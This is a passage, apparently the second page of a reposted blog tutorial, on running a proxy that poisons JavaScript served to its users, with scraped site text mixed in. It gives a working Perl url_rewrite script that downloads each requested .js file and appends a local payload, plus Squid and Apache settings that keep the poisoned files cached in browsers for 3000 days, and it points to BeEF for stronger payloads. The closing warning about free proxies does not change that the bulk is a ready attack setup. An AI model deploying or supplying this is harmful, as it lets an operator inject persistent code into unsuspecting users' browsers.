|
!/usr/bin/perl $|=1; $count = 0; $pid = $$; while(<>) { chomp $_; if($_ =- /(.*\.js)/i) { $url = $1; system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url"); system("chmod o+r /var/www/tmp/$pid-$count.js"); system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js"); print "http://127.0.0.1:80/tmp/$pid-$count.js\n"; } else { print "$_\n"; } $count++; }
This script uses wget to retrieve the original javascript file of the page the client asked for and adds the code from the /etc/squid/payload.js file to it. This modified file (which contains our payload now) will be sent to the client. You'll also have to create the folder /var/www/tmp and allow squid to write files in it. This folder is where all modified js scripts will be stored.Wc0免费翻墙网
Step 3: Tell Squid to use the script above
in /etc/squid/squid.conf addWc0免费翻墙网
url_rewrite_program /etc/squid/poison.pl
Step 4: Never let the cache expire
/var/www/tmp/.htaccessWc0免费翻墙网
ExpiresActive On ExpiresDefault "access plus 3000 days"
These lines tell the apache server to give it an insanely long expiration(caching) time so it will be in the browser of the user until they're cleaning their cookies/cachesWc0免费翻墙网
One more restart of squid and you're good to go. If you're connecting to the proxy and try to surf on any webpage, the page will be displayed as expected but all links will lead to this blog. The sneaky thing about this technique is that even when somebody disconnects from the proxy the cached js files will most likely be still in their caches.Wc0免费翻墙网
In my example the payload does nothing too destructive and the user will know pretty fast that something is fishy but with creative payloads or Frameworks like Beef all sorts of things could be implemented. Tell your friends never to use free proxies because many hosts do things like that.Wc0免费翻墙网
Be safe on the web (but not with free proxies)Wc0免费翻墙网
来自https://blog.haschek.at/post/fd9bcWc0免费翻墙网
2/2 首页 上一页 1 2
|
